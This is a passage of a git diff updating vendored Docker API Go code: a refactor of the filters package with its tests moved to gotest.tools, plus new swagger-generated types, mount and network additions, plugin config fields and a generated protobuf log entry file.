+func (args Args) FuzzyMatch(key, source string) bool {
+	if args.ExactMatch(key, source) {
 		return true
 	}
 
-	fieldValues := filters.fields[field]
+	fieldValues := args.fields[key]
 	for prefix := range fieldValues {
 		if strings.HasPrefix(source, prefix) {
 			return true
@@ -252,30 +275,47 @@ func (filters Args) FuzzyMatch(field, source string) bool {
 	return false
 }
 
-// Include returns true if the name of the field to filter is in the filters.
-func (filters Args) Include(field string) bool {
-	_, ok := filters.fields[field]
+// Include returns true if the key exists in the mapping
+//
+// Deprecated: use Contains
+func (args Args) Include(field string) bool {
+	_, ok := args.fields[field]
+	return ok
+}
+
+// Contains returns true if the key exists in the mapping
+func (args Args) Contains(field string) bool {
+	_, ok := args.fields[field]
 	return ok
 }
 
-// Validate ensures that all the fields in the filter are valid.
-// It returns an error as soon as it finds an invalid field.
-func (filters Args) Validate(accepted map[string]bool) error {
-	for name := range filters.fields {
+type invalidFilter string
+
+func (e invalidFilter) Error() string {
+	return "Invalid filter '" + string(e) + "'"
+}
+
+func (invalidFilter) InvalidParameter() {}
+
+// Validate compared the set of accepted keys against the keys in the mapping.
+// An error is returned if any mapping keys are not in the accepted set.
+func (args Args) Validate(accepted map[string]bool) error {
+	for name := range args.fields {
 		if !accepted[name] {
-			return fmt.Errorf("Invalid filter '%s'", name)
+			return invalidFilter(name)
 		}
 	}
 	return nil
 }
 
-// WalkValues iterates over the list of filtered values for a field.
-// It stops the iteration if it finds an error and it returns that error.
-func (filters Args) WalkValues(field string, op func(value string) error) error {
-	if _, ok := filters.fields[field]; !ok {
+// WalkValues iterates over the list of values for a key in the mapping and calls
+// op() for each value. If op returns an error the iteration stops and the
+// error is returned.
+func (args Args) WalkValues(field string, op func(value string) error) error {
+	if _, ok := args.fields[field]; !ok {
 		return nil
 	}
-	for v := range filters.fields[field] {
+	for v := range args.fields[field] {
 		if err := op(v); err != nil {
 			return err
 		}
diff --git a/vendor/github.com/docker/docker/api/types/filters/parse_test.go b/vendor/github.com/docker/docker/api/types/filters/parse_test.go
index b2ed27b9ce..e8345a1d5d 100644
--- a/vendor/github.com/docker/docker/api/types/filters/parse_test.go
+++ b/vendor/github.com/docker/docker/api/types/filters/parse_test.go
@@ -1,8 +1,11 @@
-package filters
+package filters // import "github.com/docker/docker/api/types/filters"
 
 import (
-	"fmt"
+	"errors"
 	"testing"
+
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
 )
 
 func TestParseArgs(t *testing.T) {
@@ -16,23 +19,18 @@ func TestParseArgs(t *testing.T) {
 		args = NewArgs()
 		err  error
 	)
+
 	for i := range flagArgs {
 		args, err = ParseFlag(flagArgs[i], args)
-		if err != nil {
-			t.Errorf("failed to parse %s: %s", flagArgs[i], err)
-		}
-	}
-	if len(args.Get("created")) != 1 {
-		t.Errorf("failed to set this arg")
-	}
-	if len(args.Get("image.name")) != 2 {
-		t.Errorf("the args should have collapsed")
+		assert.NilError(t, err)
 	}
+	assert.Check(t, is.Len(args.Get("created"), 1))
+	assert.Check(t, is.Len(args.Get("image.name"), 2))
 }
 
 func TestParseArgsEdgeCase(t *testing.T) {
-	var filters Args
-	args, err := ParseFlag("", filters)
+	var args Args
+	args, err := ParseFlag("", args)
 	if err != nil {
 		t.Fatal(err)
 	}
@@ -44,14 +42,14 @@ func TestParseArgsEdgeCase(t *testing.T) {
 	}
 }
 
-func TestToParam(t *testing.T) {
+func TestToJSON(t *testing.T) {
 	fields := map[string]map[string]bool{
 		"created":    {"today": true},
 		"image.name": {"ubuntu*": true, "*untu": true},
 	}
 	a := Args{fields: fields}
 
-	_, err := ToParam(a)
+	_, err := ToJSON(a)
 	if err != nil {
 		t.Errorf("failed to marshal the filters: %s", err)
 	}
@@ -82,7 +80,7 @@ func TestToParamWithVersion(t *testing.T) {
 	}
 }
 
-func TestFromParam(t *testing.T) {
+func TestFromJSON(t *testing.T) {
 	invalids := []string{
 		"anything",
 		"['a','list']",
@@ -90,29 +88,29 @@ func TestFromParam(t *testing.T) {
 		`{"key": "value"}`,
 	}
 	valid := map[*Args][]string{
-		&Args{fields: map[string]map[string]bool{"key": {"value": true}}}: {
+		{fields: map[string]map[string]bool{"key": {"value": true}}}: {
 			`{"key": ["value"]}`,
 			`{"key": {"value": true}}`,
 		},
-		&Args{fields: map[string]map[string]bool{"key": {"value1": true, "value2": true}}}: {
+		{fields: map[string]map[string]bool{"key": {"value1": true, "value2": true}}}: {
 			`{"key": ["value1", "value2"]}`,
 			`{"key": {"value1": true, "value2": true}}`,
 		},
-		&Args{fields: map[string]map[string]bool{"key1": {"value1": true}, "key2": {"value2": true}}}: {
+		{fields: map[string]map[string]bool{"key1": {"value1": true}, "key2": {"value2": true}}}: {
 			`{"key1": ["value1"], "key2": ["value2"]}`,
 			`{"key1": {"value1": true}, "key2": {"value2": true}}`,
 		},
 	}
 
 	for _, invalid := range invalids {
-		if _, err := FromParam(invalid); err == nil {
+		if _, err := FromJSON(invalid); err == nil {
 			t.Fatalf("Expected an error with %v, got nothing", invalid)
 		}
 	}
 
 	for expectedArgs, matchers := range valid {
 		for _, json := range matchers {
-			args, err := FromParam(json)
+			args, err := FromJSON(json)
 			if err != nil {
 				t.Fatal(err)
 			}
@@ -138,16 +136,16 @@ func TestFromParam(t *testing.T) {
 
 func TestEmpty(t *testing.T) {
 	a := Args{}
-	v, err := ToParam(a)
+	v, err := ToJSON(a)
 	if err != nil {
 		t.Errorf("failed to marshal the filters: %s", err)
 	}
-	v1, err := FromParam(v)
+	v1, err := FromJSON(v)
 	if err != nil {
 		t.Errorf("%s", err)
 	}
 	if a.Len() != v1.Len() {
-		t.Errorf("these should both be empty sets")
+		t.Error("these should both be empty sets")
 	}
 }
 
@@ -172,39 +170,39 @@ func TestArgsMatchKVList(t *testing.T) {
 	}
 
 	matches := map[*Args]string{
-		&Args{}: "field",
-		&Args{map[string]map[string]bool{
-			"created": map[string]bool{"today": true},
-			"labels":  map[string]bool{"key1": true}},
+		{}: "field",
+		{map[string]map[string]bool{
+			"created": {"today": true},
+			"labels":  {"key1": true}},
 		}: "labels",
-		&Args{map[string]map[string]bool{
-			"created": map[string]bool{"today": true},
-			"labels":  map[string]bool{"key1=value1": true}},
+		{map[string]map[string]bool{
+			"created": {"today": true},
+			"labels":  {"key1=value1": true}},
 		}: "labels",
 	}
 
 	for args, field := range matches {
-		if args.MatchKVList(field, sources) != true {
+		if !args.MatchKVList(field, sources) {
 			t.Fatalf("Expected true for %v on %v, got false", sources, args)
 		}
 	}
 
 	differs := map[*Args]string{
-		&Args{map[string]map[string]bool{
-			"created": map[string]bool{"today": true}},
+		{map[string]map[string]bool{
+			"created": {"today": true}},
 		}: "created",
-		&Args{map[string]map[string]bool{
-			"created": map[string]bool{"today": true},
-			"labels":  map[string]bool{"key4": true}},
+		{map[string]map[string]bool{
+			"created": {"today": true},
+			"labels":  {"key4": true}},
 		}: "labels",
-		&Args{map[string]map[string]bool{
-			"created": map[string]bool{"today": true},
-			"labels":  map[string]bool{"key1=value3": true}},
+		{map[string]map[string]bool{
+			"created": {"today": true},
+			"labels":  {"key1=value3": true}},
 		}: "labels",
 	}
 
 	for args, field := range differs {
-		if args.MatchKVList(field, sources) != false {
+		if args.MatchKVList(field, sources) {
 			t.Fatalf("Expected false for %v on %v, got true", sources, args)
 		}
 	}
@@ -214,53 +212,50 @@ func TestArgsMatch(t *testing.T) {
 	source := "today"
 
 	matches := map[*Args]string{
-		&Args{}: "field",
-		&Args{map[string]map[string]bool{
-			"created": map[string]bool{"today": true}},
+		{}: "field",
+		{map[string]map[string]bool{
+			"created": {"today": true}},
 		}: "today",
-		&Args{map[string]map[string]bool{
-			"created": map[string]bool{"to*": true}},
+		{map[string]map[string]bool{
+			"created": {"to*": true}},
 		}: "created",
-		&Args{map[string]map[string]bool{
-			"created": map[string]bool{"to(.*)": true}},
+		{map[string]map[string]bool{
+			"created": {"to(.*)": true}},
 		}: "created",
-		&Args{map[string]map[string]bool{
-			"created": map[string]bool{"tod": true}},
+		{map[string]map[string]bool{
+			"created": {"tod": true}},
 		}: "created",
-		&Args{map[string]map[string]bool{
-			"created": map[string]bool{"anyting": true, "to*": true}},
+		{map[string]map[string]bool{
+			"created": {"anything": true, "to*": true}},
 		}: "created",
 	}
 
 	for args, field := range matches {
-		if args.Match(field, source) != true {
-			t.Fatalf("Expected true for %v on %v, got false", source, args)
-		}
+		assert.Check(t, args.Match(field, source),
+			"Expected field %s to match %s", field, source)
 	}
 
 	differs := map[*Args]string{
-		&Args{map[string]map[string]bool{
-			"created": map[string]bool{"tomorrow": true}},
+		{map[string]map[string]bool{
+			"created": {"tomorrow": true}},
 		}: "created",
-		&Args{map[string]map[string]bool{
-			"created": map[string]bool{"to(day": true}},
+		{map[string]map[string]bool{
+			"created": {"to(day": true}},
 		}: "created",
-		&Args{map[string]map[string]bool{
-			"created": map[string]bool{"tom(.*)": true}},
+		{map[string]map[string]bool{
+			"created": {"tom(.*)": true}},
 		}: "created",
-		&Args{map[string]map[string]bool{
-			"created": map[string]bool{"tom": true}},
+		{map[string]map[string]bool{
+			"created": {"tom": true}},
 		}: "created",
-		&Args{map[string]map[string]bool{
-			"created": map[string]bool{"today1": true},
-			"labels":  map[string]bool{"today": true}},
+		{map[string]map[string]bool{
+			"created": {"today1": true},
+			"labels":  {"today": true}},
 		}: "created",
 	}
 
 	for args, field := range differs {
-		if args.Match(field, source) != false {
-			t.Fatalf("Expected false for %v on %v, got true", source, args)
-		}
+		assert.Check(t, !args.Match(field, source), "Expected field %s to not match %s", field, source)
 	}
 }
 
@@ -284,18 +279,18 @@ func TestDel(t *testing.T) {
 	f.Del("status", "running")
 	v := f.fields["status"]
 	if v["running"] {
-		t.Fatalf("Expected to not include a running status filter, got true")
+		t.Fatal("Expected to not include a running status filter, got true")
 	}
 }
 
 func TestLen(t *testing.T) {
 	f := NewArgs()
 	if f.Len() != 0 {
-		t.Fatalf("Expected to not include any field")
+		t.Fatal("Expected to not include any field")
 	}
 	f.Add("status", "running")
 	if f.Len() != 1 {
-		t.Fatalf("Expected to include one field")
+		t.Fatal("Expected to include one field")
 	}
 }
 
@@ -303,18 +298,18 @@ func TestExactMatch(t *testing.T) {
 	f := NewArgs()
 
 	if !f.ExactMatch("status", "running") {
-		t.Fatalf("Expected to match `running` when there are no filters, got false")
+		t.Fatal("Expected to match `running` when there are no filters, got false")
 	}
 
 	f.Add("status", "running")
 	f.Add("status", "pause*")
 
 	if !f.ExactMatch("status", "running") {
-		t.Fatalf("Expected to match `running` with one of the filters, got false")
+		t.Fatal("Expected to match `running` with one of the filters, got false")
 	}
 
 	if f.ExactMatch("status", "paused") {
-		t.Fatalf("Expected to not match `paused` with one of the filters, got true")
+		t.Fatal("Expected to not match `paused` with one of the filters, got true")
 	}
 }
 
@@ -322,33 +317,44 @@ func TestOnlyOneExactMatch(t *testing.T) {
 	f := NewArgs()
 
 	if !f.UniqueExactMatch("status", "running") {
-		t.Fatalf("Expected to match `running` when there are no filters, got false")
+		t.Fatal("Expected to match `running` when there are no filters, got false")
 	}
 
 	f.Add("status", "running")
 
 	if !f.UniqueExactMatch("status", "running") {
-		t.Fatalf("Expected to match `running` with one of the filters, got false")
+		t.Fatal("Expected to match `running` with one of the filters, got false")
 	}
 
 	if f.UniqueExactMatch("status", "paused") {
-		t.Fatalf("Expected to not match `paused` with one of the filters, got true")
+		t.Fatal("Expected to not match `paused` with one of the filters, got true")
 	}
 
 	f.Add("status", "pause")
 	if f.UniqueExactMatch("status", "running") {
-		t.Fatalf("Expected to not match only `running` with two filters, got true")
+		t.Fatal("Expected to not match only `running` with two filters, got true")
+	}
+}
+
+func TestContains(t *testing.T) {
+	f := NewArgs()
+	if f.Contains("status") {
+		t.Fatal("Expected to not contain a status key, got true")
+	}
+	f.Add("status", "running")
+	if !f.Contains("status") {
+		t.Fatal("Expected to contain a status key, got false")
 	}
 }
 
 func TestInclude(t *testing.T) {
 	f := NewArgs()
 	if f.Include("status") {
-		t.Fatalf("Expected to not include a status key, got true")
+		t.Fatal("Expected to not include a status key, got true")
 	}
 	f.Add("status", "running")
 	if !f.Include("status") {
-		t.Fatalf("Expected to include a status key, got false")
+		t.Fatal("Expected to include a status key, got false")
 	}
 }
 
@@ -367,7 +373,7 @@ func TestValidate(t *testing.T) {
 
 	f.Add("bogus", "running")
 	if err := f.Validate(valid); err == nil {
-		t.Fatalf("Expected to return an error, got nil")
+		t.Fatal("Expected to return an error, got nil")
 	}
 }
 
@@ -384,14 +390,14 @@ func TestWalkValues(t *testing.T) {
 	})
 
 	err := f.WalkValues("status", func(value string) error {
-		return fmt.Errorf("return")
+		return errors.New("return")
 	})
 	if err == nil {
-		t.Fatalf("Expected to get an error, got nil")
+		t.Fatal("Expected to get an error, got nil")
 	}
 
 	err = f.WalkValues("foo", func(value string) error {
-		return fmt.Errorf("return")
+		return errors.New("return")
 	})
 	if err != nil {
 		t.Fatalf("Expected to not iterate when the field doesn't exist, got %v", err)
diff --git a/vendor/github.com/docker/docker/api/types/graph_driver_data.go b/vendor/github.com/docker/docker/api/types/graph_driver_data.go
new file mode 100644
index 0000000000..4d9bf1c62c
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/types/graph_driver_data.go
@@ -0,0 +1,17 @@
+package types
+
+// This file was generated by the swagger tool.
+// Editing this file might prove futile when you re-run the swagger generate command
+
+// GraphDriverData Information about a container's graph driver.
+// swagger:model GraphDriverData
+type GraphDriverData struct {
+
+	// data
+	// Required: true
+	Data map[string]string `json:"Data"`
+
+	// name
+	// Required: true
+	Name string `json:"Name"`
+}
diff --git a/vendor/github.com/docker/docker/api/types/image/image_history.go b/vendor/github.com/docker/docker/api/types/image/image_history.go
new file mode 100644
index 0000000000..d6b354bcdf
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/types/image/image_history.go
@@ -0,0 +1,37 @@
+package image
+
+// ----------------------------------------------------------------------------
+// DO NOT EDIT THIS FILE
+// This file was generated by `swagger generate operation`
+//
+// See hack/generate-swagger-api.sh
+// ----------------------------------------------------------------------------
+
+// HistoryResponseItem individual image layer information in response to ImageHistory operation
+// swagger:model HistoryResponseItem
+type HistoryResponseItem struct {
+
+	// comment
+	// Required: true
+	Comment string `json:"Comment"`
+
+	// created
+	// Required: true
+	Created int64 `json:"Created"`
+
+	// created by
+	// Required: true
+	CreatedBy string `json:"CreatedBy"`
+
+	// Id
+	// Required: true
+	ID string `json:"Id"`
+
+	// size
+	// Required: true
+	Size int64 `json:"Size"`
+
+	// tags
+	// Required: true
+	Tags []string `json:"Tags"`
+}
diff --git a/vendor/github.com/docker/docker/api/types/image_delete_response_item.go b/vendor/github.com/docker/docker/api/types/image_delete_response_item.go
new file mode 100644
index 0000000000..b9a65a0d8e
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/types/image_delete_response_item.go
@@ -0,0 +1,15 @@
+package types
+
+// This file was generated by the swagger tool.
+// Editing this file might prove futile when you re-run the swagger generate command
+
+// ImageDeleteResponseItem image delete response item
+// swagger:model ImageDeleteResponseItem
+type ImageDeleteResponseItem struct {
+
+	// The image ID of an image that was deleted
+	Deleted string `json:"Deleted,omitempty"`
+
+	// The image ID of an image that was untagged
+	Untagged string `json:"Untagged,omitempty"`
+}
diff --git a/vendor/github.com/docker/docker/api/types/mount/mount.go b/vendor/github.com/docker/docker/api/types/mount/mount.go
index 31f2365b8e..3fef974df8 100644
--- a/vendor/github.com/docker/docker/api/types/mount/mount.go
+++ b/vendor/github.com/docker/docker/api/types/mount/mount.go
@@ -1,4 +1,4 @@
-package mount
+package mount // import "github.com/docker/docker/api/types/mount"
 
 import (
 	"os"
@@ -15,6 +15,8 @@ const (
 	TypeVolume Type = "volume"
 	// TypeTmpfs is the type for mounting tmpfs
 	TypeTmpfs Type = "tmpfs"
+	// TypeNamedPipe is the type for mounting Windows named pipes
+	TypeNamedPipe Type = "npipe"
 )
 
 // Mount represents a mount (volume).
@@ -23,9 +25,10 @@ type Mount struct {
 	// Source specifies the name of the mount. Depending on mount type, this
 	// may be a volume name or a host path, or even ignored.
 	// Source is not supported for tmpfs (must be an empty value)
-	Source   string `json:",omitempty"`
-	Target   string `json:",omitempty"`
-	ReadOnly bool   `json:",omitempty"`
+	Source      string      `json:",omitempty"`
+	Target      string      `json:",omitempty"`
+	ReadOnly    bool        `json:",omitempty"`
+	Consistency Consistency `json:",omitempty"`
 
 	BindOptions   *BindOptions   `json:",omitempty"`
 	VolumeOptions *VolumeOptions `json:",omitempty"`
@@ -60,6 +63,20 @@ var Propagations = []Propagation{
 	PropagationSlave,
 }
 
+// Consistency represents the consistency requirements of a mount.
+type Consistency string
+
+const (
+	// ConsistencyFull guarantees bind mount-like consistency
+	ConsistencyFull Consistency = "consistent"
+	// ConsistencyCached mounts can cache read data and FS structure
+	ConsistencyCached Consistency = "cached"
+	// ConsistencyDelegated mounts can cache read and written data and structure
+	ConsistencyDelegated Consistency = "delegated"
+	// ConsistencyDefault provides "consistent" behavior unless overridden
+	ConsistencyDefault Consistency = "default"
+)
+
 // BindOptions defines options specific to mounts of type "bind".
 type BindOptions struct {
 	Propagation Propagation `json:",omitempty"`
@@ -83,7 +100,7 @@ type TmpfsOptions struct {
 	// Size sets the size of the tmpfs, in bytes.
 	//
 	// This will be converted to an operating system specific value
-	// depending on the host. For example, on linux, it will be convered to
+	// depending on the host. For example, on linux, it will be converted to
 	// use a 'k', 'm' or 'g' syntax. BSD, though not widely supported with
 	// docker, uses a straight byte value.
 	//
diff --git a/vendor/github.com/docker/docker/api/types/network/network.go b/vendor/github.com/docker/docker/api/types/network/network.go
index 832b3edb9f..761d0b34f2 100644
--- a/vendor/github.com/docker/docker/api/types/network/network.go
+++ b/vendor/github.com/docker/docker/api/types/network/network.go
@@ -1,4 +1,4 @@
-package network
+package network // import "github.com/docker/docker/api/types/network"
 
 // Address represents an IP address
 type Address struct {
@@ -28,7 +28,15 @@ type EndpointIPAMConfig struct {
 	LinkLocalIPs []string `json:",omitempty"`
 }
 
-// PeerInfo represents one peer of a overlay network
+// Copy makes a copy of the endpoint ipam config
+func (cfg *EndpointIPAMConfig) Copy() *EndpointIPAMConfig {
+	cfgCopy := *cfg
+	cfgCopy.LinkLocalIPs = make([]string, 0, len(cfg.LinkLocalIPs))
+	cfgCopy.LinkLocalIPs = append(cfgCopy.LinkLocalIPs, cfg.LinkLocalIPs...)
+	return &cfgCopy
+}
+
+// PeerInfo represents one peer of an overlay network
 type PeerInfo struct {
 	Name string
 	IP   string
@@ -50,6 +58,42 @@ type EndpointSettings struct {
 	GlobalIPv6Address   string
 	GlobalIPv6PrefixLen int
 	MacAddress          string
+	DriverOpts          map[string]string
+}
+
+// Task carries the information about one backend task
+type Task struct {
+	Name       string
+	EndpointID string
+	EndpointIP string
+	Info       map[string]string
+}
+
+// ServiceInfo represents service parameters with the list of service's tasks
+type ServiceInfo struct {
+	VIP          string
+	Ports        []string
+	LocalLBIndex int
+	Tasks        []Task
+}
+
+// Copy makes a deep copy of `EndpointSettings`
+func (es *EndpointSettings) Copy() *EndpointSettings {
+	epCopy := *es
+	if es.IPAMConfig != nil {
+		epCopy.IPAMConfig = es.IPAMConfig.Copy()
+	}
+
+	if es.Links != nil {
+		links := make([]string, 0, len(es.Links))
+		epCopy.Links = append(links, es.Links...)
+	}
+
+	if es.Aliases != nil {
+		aliases := make([]string, 0, len(es.Aliases))
+		epCopy.Aliases = append(aliases, es.Aliases...)
+	}
+	return &epCopy
 }
 
 // NetworkingConfig represents the container's networking configuration for each of its interfaces
@@ -57,3 +101,8 @@ type EndpointSettings struct {
 type NetworkingConfig struct {
 	EndpointsConfig map[string]*EndpointSettings // Endpoint configs for each connecting network
 }
+
+// ConfigReference specifies the source which provides a network's configuration
+type ConfigReference struct {
+	Network string
+}
diff --git a/vendor/github.com/docker/docker/api/types/plugin.go b/vendor/github.com/docker/docker/api/types/plugin.go
index 6cc7a23b02..abae48b9ab 100644
--- a/vendor/github.com/docker/docker/api/types/plugin.go
+++ b/vendor/github.com/docker/docker/api/types/plugin.go
@@ -11,7 +11,7 @@ type Plugin struct {
 	// Required: true
 	Config PluginConfig `json:"Config"`
 
-	// True when the plugin is running. False when the plugin is not running, only installed.
+	// True if the plugin is running. False if the plugin is not running, only installed.
 	// Required: true
 	Enabled bool `json:"Enabled"`
 
@@ -42,6 +42,9 @@ type PluginConfig struct {
 	// Required: true
 	Description string `json:"Description"`
 
+	// Docker Version used to create the plugin
+	DockerVersion string `json:"DockerVersion,omitempty"`
+
 	// documentation
 	// Required: true
 	Documentation string `json:"Documentation"`
@@ -58,6 +61,10 @@ type PluginConfig struct {
 	// Required: true
 	Interface PluginConfigInterface `json:"Interface"`
 
+	// ipc host
+	// Required: true
+	IpcHost bool `json:"IpcHost"`
+
 	// linux
 	// Required: true
 	Linux PluginConfigLinux `json:"Linux"`
@@ -70,6 +77,10 @@ type PluginConfig struct {
 	// Required: true
 	Network PluginConfigNetwork `json:"Network"`
 
+	// pid host
+	// Required: true
+	PidHost bool `json:"PidHost"`
+
 	// propagated mount
 	// Required: true
 	PropagatedMount string `json:"PropagatedMount"`
@@ -110,6 +121,9 @@ type PluginConfigArgs struct {
 // swagger:model PluginConfigInterface
 type PluginConfigInterface struct {
 
+	// Protocol to use for clients connecting to the plugin.
+	ProtocolScheme string `json:"ProtocolScheme,omitempty"`
+
 	// socket
 	// Required: true
 	Socket string `json:"Socket"`
diff --git a/vendor/github.com/docker/docker/api/types/plugin_responses.go b/vendor/github.com/docker/docker/api/types/plugin_responses.go
index d6f7553119..60d1fb5ad8 100644
--- a/vendor/github.com/docker/docker/api/types/plugin_responses.go
+++ b/vendor/github.com/docker/docker/api/types/plugin_responses.go
@@ -1,21 +1,14 @@
-package types
+package types // import "github.com/docker/docker/api/types"
 
 import (
 	"encoding/json"
 	"fmt"
+	"sort"
 )
 
 // PluginsListResponse contains the response for the Engine API
 type PluginsListResponse []*Plugin
 
-const (
-	authzDriver   = "AuthzDriver"
-	graphDriver   = "GraphDriver"
-	ipamDriver    = "IpamDriver"
-	networkDriver = "NetworkDriver"
-	volumeDriver  = "VolumeDriver"
-)
-
 // UnmarshalJSON implements json.Unmarshaler for PluginInterfaceType
 func (t *PluginInterfaceType) UnmarshalJSON(p []byte) error {
 	versionIndex := len(p)
@@ -62,3 +55,17 @@ type PluginPrivilege struct {
 
 // PluginPrivileges is a list of PluginPrivilege
 type PluginPrivileges []PluginPrivilege
+
+func (s PluginPrivileges) Len() int {
+	return len(s)
+}
+
+func (s PluginPrivileges) Less(i, j int) bool {
+	return s[i].Name < s[j].Name
+}
+
+func (s PluginPrivileges) Swap(i, j int) {
+	sort.Strings(s[i].Value)
+	sort.Strings(s[j].Value)
+	s[i], s[j] = s[j], s[i]
+}
diff --git a/vendor/github.com/docker/docker/api/types/plugins/logdriver/entry.pb.go b/vendor/github.com/docker/docker/api/types/plugins/logdriver/entry.pb.go
new file mode 100644
index 0000000000..5d7d8b4c41
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/types/plugins/logdriver/entry.pb.go
@@ -0,0 +1,449 @@
+// Code generated by protoc-gen-gogo.
+// source: entry.proto
+// DO NOT EDIT!
+
+/*
+	Package logdriver is a generated protocol buffer package.
+
+	It is generated from these files:
+		entry.proto
+
+	It has these top-level messages:
+		LogEntry
+*/
+package logdriver
+
+import proto "github.com/gogo/protobuf/proto"
+import fmt "fmt"
+import math "math"
+
+import io "io"
+
+// Reference imports to suppress errors if they are not otherwise used.
+var _ = proto.Marshal
+var _ = fmt.Errorf
+var _ = math.Inf
+
+// This is a compile-time assertion to ensure that this generated file
+// is compatible with the proto package it is being compiled against.
+// A compilation error at this line likely means your copy of the
+// proto package needs to be updated.
+const _ = proto.GoGoProtoPackageIsVersion2 // please upgrade the proto package
+
+type LogEntry struct {
+	Source   string `protobuf:"bytes,1,opt,name=source,proto3" json:"source,omitempty"`
+	TimeNano int64  `protobuf:"varint,2,opt,name=time_nano,json=timeNano,proto3" json:"time_nano,omitempty"`
+	Line     []byte `protobuf:"bytes,3,opt,name=line,proto3" json:"line,omitempty"`
+	Partial  bool   `protobuf:"varint,4,opt,name=partial,proto3" json:"partial,omitempty"`
+}
+
+func (m *LogEntry) Reset()                    { *m = LogEntry{} }
+func (m *LogEntry) String() string            { return proto.CompactTextString(m) }
+func (*LogEntry) ProtoMessage()               {}
+func (*LogEntry) Descriptor() ([]byte, []int) { return fileDescriptorEntry, []int{0} }
+
+func (m *LogEntry) GetSource() string {
+	if m != nil {
+		return m.Source
+	}
+	return ""
+}
+
+func (m *LogEntry) GetTimeNano() int64 {
+	if m != nil {
+		return m.TimeNano
+	}
+	return 0
+}
+
+func (m *LogEntry) GetLine() []byte {
+	if m != nil {
+		return m.Line
+	}
+	return nil
+}
+
+func (m *LogEntry) GetPartial() bool {
+	if m != nil {
+		return m.Partial
+	}
+	return false
+}
+
+func init() {
+	proto.RegisterType((*LogEntry)(nil), "LogEntry")
+}
+func (m *LogEntry) Marshal() (dAtA []byte, err error) {
+	size := m.Size()
+	dAtA = make([]byte, size)
+	n, err := m.MarshalTo(dAtA)
+	if err != nil {
+		return nil, err
+	}
+	return dAtA[:n], nil
+}
+
+func (m *LogEntry) MarshalTo(dAtA []byte) (int, error) {
+	var i int
+	_ = i
+	var l int
+	_ = l
+	if len(m.Source) > 0 {
+		dAtA[i] = 0xa
+		i++
+		i = encodeVarintEntry(dAtA, i, uint64(len(m.Source)))
+		i += copy(dAtA[i:], m.Source)
+	}
+	if m.TimeNano != 0 {
+		dAtA[i] = 0x10
+		i++
+		i = encodeVarintEntry(dAtA, i, uint64(m.TimeNano))
+	}
+	if len(m.Line) > 0 {
+		dAtA[i] = 0x1a
+		i++
+		i = encodeVarintEntry(dAtA, i, uint64(len(m.Line)))
+		i += copy(dAtA[i:], m.Line)
+	}
+	if m.Partial {
+		dAtA[i] = 0x20
+		i++
+		if m.Partial {
+			dAtA[i] = 1
+		} else {
+			dAtA[i] = 0
+		}
+		i++
+	}
+	return i, nil
+}
+
+func encodeFixed64Entry(dAtA []byte, offset int, v uint64) int {
+	dAtA[offset] = uint8(v)
+	dAtA[offset+1] = uint8(v >> 8)
+	dAtA[offset+2] = uint8(v >> 16)
+	dAtA[offset+3] = uint8(v >> 24)
+	dAtA[offset+4] = uint8(v >> 32)
+	dAtA[offset+5] = uint8(v >> 40)
+	dAtA[offset+6] = uint8(v >> 48)
+	dAtA[offset+7] = uint8(v >> 56)
+	return offset + 8
+}
+func encodeFixed32Entry(dAtA []byte, offset int, v uint32) int {
+	dAtA[offset] = uint8(v)
+	dAtA[offset+1] = uint8(v >> 8)
+	dAtA[offset+2] = uint8(v >> 16)
+	dAtA[offset+3] = uint8(v >> 24)
+	return offset + 4
+}
+func encodeVarintEntry(dAtA []byte, offset int, v uint64) int {
+	for v >= 1<<7 {
+		dAtA[offset] = uint8(v&0x7f | 0x80)
+		v >>= 7
+		offset++
+	}
+	dAtA[offset] = uint8(v)
+	return offset + 1
+}
+func (m *LogEntry) Size() (n int) {
+	var l int
+	_ = l
+	l = len(m.Source)
+	if l > 0 {
+		n += 1 + l + sovEntry(uint64(l))
+	}
+	if m.TimeNano != 0 {
+		n += 1 + sovEntry(uint64(m.TimeNano))
+	}
+	l = len(m.Line)
+	if l > 0 {
+		n += 1 + l + sovEntry(uint64(l))
+	}
+	if m.Partial {
+		n += 2
+	}
+	return n
+}
+
+func sovEntry(x uint64) (n int) {
+	for {
+		n++
+		x >>= 7
+		if x == 0 {
+			break
+		}
+	}
+	return n
+}
+func sozEntry(x uint64) (n int) {
+	return sovEntry(uint64((x << 1) ^ uint64((int64(x) >> 63))))
+}
+func (m *LogEntry) Unmarshal(dAtA []byte) error {
+	l := len(dAtA)
+	iNdEx := 0
+	for iNdEx < l {
+		preIndex := iNdEx
+		var wire uint64
+		for shift := uint(0); ; shift += 7 {
+			if shift >= 64 {
+				return ErrIntOverflowEntry
+			}
+			if iNdEx >= l {
+				return io.ErrUnexpectedEOF
+			}
+			b := dAtA[iNdEx]
+			iNdEx++
+			wire |= (uint64(b) & 0x7F) << shift
+			if b < 0x80 {
+				break
+			}
+		}
+		fieldNum := int32(wire >> 3)
+		wireType := int(wire & 0x7)
+		if wireType == 4 {
+			return fmt.Errorf("proto: LogEntry: wiretype end group for non-group")
+		}
+		if fieldNum <= 0 {
+			return fmt.Errorf("proto: LogEntry: illegal tag %d (wire type %d)", fieldNum, wire)
+		}
+		switch fieldNum {
+		case 1:
+			if wireType != 2 {
+				return fmt.Errorf("proto: wrong wireType = %d for field Source", wireType)
+			}
+			var stringLen uint64
+			for shift := uint(0); ; shift += 7 {
+				if shift >= 64 {
+					return ErrIntOverflowEntry
+				}
+				if iNdEx >= l {
+					return io.ErrUnexpectedEOF
+				}
+				b := dAtA[iNdEx]
+				iNdEx++
+				stringLen |= (uint64(b) & 0x7F) << shift
+				if b < 0x80 {
+					break
+				}
+			}
+			intStringLen := int(stringLen)
+			if intStringLen < 0 {
+				return ErrInvalidLengthEntry
+			}
+			postIndex := iNdEx + intStringLen
+			if postIndex > l {
+				return io.ErrUnexpectedEOF
+			}
+			m.Source = string(dAtA[iNdEx:postIndex])
+			iNdEx = postIndex
+		case 2:
+			if wireType != 0 {
+				return fmt.Errorf("proto: wrong wireType = %d for field TimeNano", wireType)
+			}
+			m.TimeNano = 0
+			for shift := uint(0); ; shift += 7 {
+				if shift >= 64 {
+					return ErrIntOverflowEntry
+				}
+				if iNdEx >= l {
+					return io.ErrUnexpectedEOF
+				}
+				b := dAtA[iNdEx]
+				iNdEx++
+				m.TimeNano |= (int64(b) & 0x7F) << shift
+				if b < 0x80 {
+					break
+				}
+			}
+		case 3:
+			if wireType != 2 {
